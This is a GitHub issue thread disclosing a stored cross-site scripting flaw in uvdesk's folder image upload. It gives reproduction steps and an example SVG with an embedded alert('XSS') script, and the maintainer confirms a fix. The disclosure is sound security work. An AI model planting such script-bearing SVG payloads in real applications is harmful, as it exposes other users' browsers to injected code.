Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Folder Image allows upload .svg file and execute arbitrary javascript code #494

Closed
noobpk opened this issue Dec 10, 2021 · 7 comments
Closed

Folder Image allows upload .svg file and execute arbitrary javascript code #494

noobpk opened this issue Dec 10, 2021 · 7 comments

Comments

@noobpk
Copy link

noobpk commented Dec 10, 2021

Description
Stored XSS via 'Folder Image' when Add Folder

How to reproduce

  1. Goto Folders choose to New Folder
  2. Choose Folder Image with file .svg contain payload
    Example SVG
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

The XSS will trigger when access folder image
Example: https://demo.uvdesk.com/uvdesk-demo-118-70-149-30//assets/knowledgebase/lIkHGHFooTYEKQOu.svg

Possible Solution
Using CSP or don't allow upload .svg extension

Additional context
Disclosure : https://huntr.dev/bounties/31e2217a-aa0c-4d0a-96ec-0bc1987a2808/
@vipin-shrivastava
Copy link
Contributor

@noobpk

Thanks, We will check & fix it soon.

@noobpk
Copy link
Author

noobpk commented Dec 10, 2021

@noobpk

Thanks, We will check & fix it soon.

The vulnerability was found by me 2 months ago but I don't know why the huntr's system didn't send it to you.
After checking the vulnerability please validate my report on huntr.

Thanks ^^!!

This was referenced Dec 16, 2021
Merged
Merged
@vipin-shrivastava
Copy link
Contributor

Thanks @noobpk, We found this security issue & have also fixed it.

@vipin-shrivastava
Copy link
Contributor

@noobpk, Not able to validate your report on huntr.
image

@noobpk
Copy link
Author

noobpk commented Dec 17, 2021

@noobpk, Not able to validate your report on huntr.
image

@vipin-shrivastava You need login in Huntr platform with a maintainer account. Because the report is private. Only maintainer and reporter can view the report ^^!!

@vipin-shrivastava
Copy link
Contributor

@noobpk, Not able to validate your report on huntr.
image

@vipin-shrivastava You need login in Huntr platform with a maintainer account. Because the report is private. Only the maintainer and reporter can view the report ^^!!

done 👍

@noobpk
Copy link
Author

noobpk commented Dec 17, 2021

@noobpk, Not able to validate your report on huntr.
image

@vipin-shrivastava You need login in Huntr platform with a maintainer account. Because the report is private. Only the maintainer and reporter can view the report ^^!!

done 👍

Thanks. I see you fixed that. It would be great if you confirmed the fix on huntr to change the report status to public. ♥️

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@noobpk @vipin-shrivastava